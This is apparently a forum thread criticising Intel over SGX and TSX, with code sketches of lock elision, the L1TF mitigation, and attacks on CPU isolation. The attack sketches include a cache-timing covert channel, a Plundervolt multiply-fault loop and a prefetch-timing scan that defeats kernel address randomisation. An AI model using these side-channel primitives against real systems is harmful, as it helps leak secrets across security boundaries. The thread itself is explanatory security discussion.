Yup. SGX, TSX, all the interesting and complicated stuff seems to be getting deprecated after half a decade or more of "We got it! No, wait, we didn't... uh, this time we got it! Wait, crap, no... uh... but this time! Oh carp. Yeah, you know, screw it."
After several of those "Release, revert" cycles, it ends up as a self-fulfilling prophecy anyway - it's like the sentiment you often see toward Google's new products: "This, too, shall rapidly pass when they get bored." After you've seen TSX disabled on a few generations of chips, the motivation to put in the work to use TSX just evaporates, because you've no confidence that it'll actually work, or stay working, on the hardware you want to run on. And because of the requirement to have a fallback path, TSX is a good bit more work, and often more complexity, than a simple lock-based approach that's good enough and easy to understand and validate.
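For a sense of what that fallback requirement means in practice, the standard lock-elision pattern looks roughly like this (a minimal sketch using the RTM intrinsics and a hand-rolled spinlock; it assumes you've already checked CPUID for RTM support, and real code adds retry heuristics before giving up on the transaction):

    #include <immintrin.h>   /* RTM intrinsics - compile with -mrtm */
    #include <stdatomic.h>

    static atomic_int lock_taken;   /* trivial fallback spinlock */
    static long counter;            /* the shared state we protect */

    static void take_lock(void) { while (atomic_exchange(&lock_taken, 1)) ; }
    static void drop_lock(void) { atomic_store(&lock_taken, 0); }

    void increment(void)
    {
        if (_xbegin() == _XBEGIN_STARTED) {
            /* Read the lock word inside the transaction: if a fallback-path
               holder has it, abort; otherwise it joins our read set and any
               concurrent lock acquisition aborts us automatically. */
            if (atomic_load(&lock_taken))
                _xabort(0xff);
            counter++;
            _xend();
            return;
        }
        /* Transaction aborted (or TSX disabled in microcode, where xbegin
           just always aborts): do the same work under the plain lock. */
        take_lock();
        counter++;
        drop_lock();
    }

Note that the lock path has to exist and be fully correct on its own - so the transactional path is pure additional work, which is exactly where the motivation evaporates.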
But my deeper concern is that it seems nobody at Intel is capable of understanding all the interactions in the chip anymore - and SGX offers very strong evidence of that inability.
SGX made the strong claim that, when deployed, a fully malicious ring 0 operating system could neither observe anything about the state of the computation happening in the enclave nor modify its operation. They did various interesting things with how pages were swapped out to prevent replay attacks, and really did try to build it such that you couldn't mess with it. But they did these things at a high level, without fully understanding the nature of the chip underneath.
The L1TF (L1 Terminal Fault, also known as Foreshadow) attacks took advantage of edge-case L1 cache behavior to speculatively read out anything that was in the L1 cache, which included SGX enclave data. If I remember properly, because you could read out the stored register state as well as the memory pages you faulted in, they demonstrated you could essentially single-step a production SGX enclave with full register state and full memory state at every single instruction. Whoops.
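The setup for the terminal fault itself is the hard, Intel-specific part, but the back half of these transient-execution attacks is the same cache covert channel every time. Conceptually it looks like this (a sketch of the channel only, not a working exploit - the fault setup, fault suppression, and the flushing of the probe array before each round are all omitted):

    #include <stdint.h>
    #include <x86intrin.h>              /* __rdtscp */

    static uint8_t probe[256 * 4096];   /* one page per possible byte value */

    /* Transient half: in the real attack this runs speculatively after the
       faulting load. The architectural results get squashed, but the
       probe-array access leaves its mark in the cache. */
    static void transmit(const uint8_t *secret_ptr)
    {
        uint8_t value = *secret_ptr;                     /* speculated load */
        (void)*(volatile uint8_t *)&probe[value * 4096]; /* value -> cache line */
    }

    /* Architectural half: time every probe page; the one speculation
       touched loads measurably faster, recovering the secret byte. */
    static int receive(void)
    {
        int best = -1;
        uint64_t best_time = ~0ULL;
        for (int v = 0; v < 256; v++) {
            unsigned aux;
            uint64_t t0 = __rdtscp(&aux);
            (void)*(volatile uint8_t *)&probe[v * 4096];
            uint64_t dt = __rdtscp(&aux) - t0;
            if (dt < best_time) { best_time = dt; best = v; }
        }
        return best;
    }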
It's not hard to mitigate once you know the problem - just flush L1 entirely on enclave exit. But Intel didn't know it was a problem, so they didn't do that.
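And that's essentially what the fix ended up being: a microcode update that flushes L1D on enclave exit, plus a new MSR so kernels and hypervisors can do the same on transitions like VM entry. The software side is about as small as mitigations get (ring-0 sketch; real kernels gate this on the CPUID enumeration bit first):

    #include <stdint.h>

    #define MSR_IA32_FLUSH_CMD  0x10b   /* added by the L1TF microcode update */
    #define L1D_FLUSH           (1ULL << 0)

    /* wrmsr is privileged - this is kernel/hypervisor-side code. */
    static inline void wrmsr(uint32_t msr, uint64_t val)
    {
        __asm__ volatile("wrmsr" : : "c"(msr),
                         "a"((uint32_t)val), "d"((uint32_t)(val >> 32)));
    }

    /* Dump the whole L1D so a terminal fault on the other side of the
       transition has nothing left to speculate out of. Availability is
       enumerated in CPUID.(EAX=7,ECX=0):EDX[28]. */
    static void flush_l1d(void)
    {
        wrmsr(MSR_IA32_FLUSH_CMD, L1D_FLUSH);
    }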
On the flip side - "influencing operation" - there was Plundervolt. This involved the OS using an undocumented (grumble, growl) MSR to reduce the chip's voltage, intended to improve power efficiency. However, the OS (that untrusted ring 0 thing...) has control over this register, and there are no sane limits on it: the OS can drop the voltage far enough that things like multiplies and AES operations start silently faulting and glitching, without going low enough that the chip stops functioning. Enter an enclave in this state, wait for a multiply or an AES round to fault in the useful ways they will, and you've just influenced operation such that you can pull keys out. Whoops.
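The fault-inducing half of Plundervolt really is that crude - pull the voltage offset down in small steps from ring 0, then spin on a multiply until the hardware silently gets one wrong. A from-memory sketch of the detector loop (the constants are just of the flavor the paper used; anything that keeps the multiplier busy works):

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
        /* volatile stops the compiler from constant-folding the multiply. */
        volatile uint64_t a = 0xdeadbeefULL;
        volatile uint64_t b = 0x1122334455667788ULL;
        const uint64_t expected = 0xdeadbeefULL * 0x1122334455667788ULL;

        /* With the offset in the undervolting MSR (0x150) pulled low
           enough, this eventually computes a wrong product - silently,
           with the core otherwise still running fine. */
        for (;;) {
            uint64_t got = a * b;
            if (got != expected) {
                printf("glitched: %016llx != %016llx\n",
                       (unsigned long long)got, (unsigned long long)expected);
                return 0;
            }
        }
    }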
Again, it's not hard to mitigate: refuse to enter the enclave if the voltage isn't at stock settings (you can't just reset it on entry, because it takes time for the VRMs to bring the voltage back up). But Intel didn't do this. The people who added this neat little efficiency hack and then kept it secret apparently never crossed paths with the people in charge of the new flagship security feature, or with the sort of adversarial thinkers who ask, "Now, wait a minute, what if I push this beyond sane bounds?"
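The missing check is about one line. A deliberately hypothetical sketch - read_core_voltage_offset() is a made-up helper standing in for querying the undervolting MSR; the fix Intel actually shipped was microcode letting the BIOS lock that MSR out, surfaced to remote parties through attestation/TCB updates:

    #include <stdint.h>

    /* Hypothetical sketch of the missing check - not Intel's actual fix.
       The helper below is made up for illustration. */
    extern int64_t read_core_voltage_offset(void);   /* hypothetical */

    int safe_to_enter_enclave(void)
    {
        /* Zeroing the offset and entering immediately isn't enough: the
           VRMs take real time to slew the voltage back up. While any
           undervolt is applied, the only safe answer is "no". */
        return read_core_voltage_offset() == 0;
    }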
You can point at the other speculative stuff and claim it's not really a problem because architectural behavior is correct (I think that sort of reasoning is rubbish, when you can speculate your way past all security boundaries on the chip), but the SGX case, specifically, demonstrates that Intel didn't know about the problems or they would have taken the very simple mitigation steps. And that tells me that they can't reason about their chips as a whole.
... and that - the companies building the most critical components of the system not fully understanding how those components operate - is scary. The foundation of everything is in an unknown state, and nobody knows how broken it is until some researchers go in and figure it out.
More than once, after fixing the exact thing the researchers found, Intel has also ended up with egg on their face of the "... so we found this very, very closely related, conceptually identical bug that they didn't fix with the last patches..." variety. It seems safe to say that there are university students and faculty who understand the security implications of Intel's design decisions better than the people at Intel in charge of such things.
We're running, very rapidly, out of "complexity runway." Everything, from the very chips on up, is so complex that nobody can reason about it, and the only solution on offer for the problems caused by complexity is "Well, let's add more complexity to fix those problems." It's not the sort of thing that can go on forever.
Anyway. </rant about the state of Intel>
> I think that sort of reasoning is rubbish, when you can speculate your way past all security boundaries on the chip
The ring boundaries of protected mode were never meant as a strong security feature against malice. The documentation for the 286, the first CPU in which they were introduced, is quite explicit about that. It's unfortunate how many people assumed otherwise and built an entire industry on that misunderstanding.
One sees the same problem with ASLR - page tables were never intended or designed to carry security-sensitive information, which the randomized layouts of the various forms of ASLR effectively are. And so we see the prefetch oracle, and various cache-based trickery to de-ASLR things, because the page tables and page walkers were only ever designed for correctness, never security.
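The prefetch oracle in particular is tiny: prefetch instructions never fault, even on kernel addresses, and their latency depends on what the page walker finds. A sketch of the Gruss et al. idea (the base and stride are illustrative for pre-KPTI x86-64 Linux; a real attack repeats measurements and filters noise):

    #include <stdint.h>
    #include <x86intrin.h>      /* _mm_prefetch, __rdtscp, _mm_mfence */

    /* Time a single prefetch of an arbitrary (even kernel) address.
       The latency asymmetry between mapped and unmapped is the leak. */
    static uint64_t time_prefetch(uintptr_t addr)
    {
        unsigned aux;
        _mm_mfence();
        uint64_t t0 = __rdtscp(&aux);
        _mm_prefetch((const char *)addr, _MM_HINT_T0);
        uint64_t t1 = __rdtscp(&aux);
        _mm_mfence();
        return t1 - t0;
    }

    /* Scan candidate KASLR slots; the mapped one prefetches
       measurably faster. */
    uintptr_t guess_kernel_base(void)
    {
        uintptr_t best = 0;
        uint64_t best_time = ~0ULL;
        for (uintptr_t a = 0xffffffff80000000ULL;
             a < 0xffffffffc0000000ULL; a += 0x200000) {
            uint64_t t = time_prefetch(a);
            if (t < best_time) { best_time = t; best = a; }
        }
        return best;
    }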
I don't know how to fix it, though.
I've been experimenting with Qubes lately, which disables hyperthreading if you have it, and uses hardware isolated VMs to at least make things a little bit harder - the assumption is that within a running OS VM/silo, anything can access anything, so keep them separated. And they've done a lot of good paranoid work along those lines. I'm just not sure the end goal of very strong isolation is even possible on the same machine.
Of course, there are chips that are immune to speculation based vulnerabilities. They're not fast, and they're not very modern, but the Atom D525 in my little netbook has an empty "bugs" field in /proc/cpuinfo, because it's an in-order, non-speculative x86 core. It's just rather glacial.
I agree with a lot of what you write, and I also think we are way beyond that "comprehensibility boundary" when it comes to modern tech stacks. There is simply no single person who understands exactly what happens at every level of the stack when I send this reply.
But also, this process of "we got it, wait, we didn't..." is just how real-world security works; there is no way around it. Security is not <clever research team comes up with moon math> and the problem is solved. Security is complex, and it takes years of attack incentives and hardening to mature. TLS implementations can use the best crypto algorithms we know of, and we still get Heartbleed. With the very first release of SGX, Intel introduced the TCB recovery mechanism precisely because they knew users were bound to find vulnerabilities.
There is also a strong hysteresis effect because of the long release cycle of chips. For example, SGX shipped in 2015/2016 with Skylake, and two years later we discovered Meltdown/Spectre and, with them, a whole new dimension of attacks on the CPU. Intel couldn't just release a hotfix for their hardware; it took a lot of time and work to redesign the CPU to be more side-channel resistant, and in the meantime security researchers naturally latched onto these attacks, giving the false impression that the whole idea of secure compute is flawed.
Personally, I would not bet on confidential computing (CC) tech becoming obsolete - on the contrary, Big Tech is pumping more and more resources into it, and there is increasing demand from various industries. The tech will stay around, it will mature, and perhaps vendors will even start to introduce HSM-like hardware protection mechanisms if there is enough demand.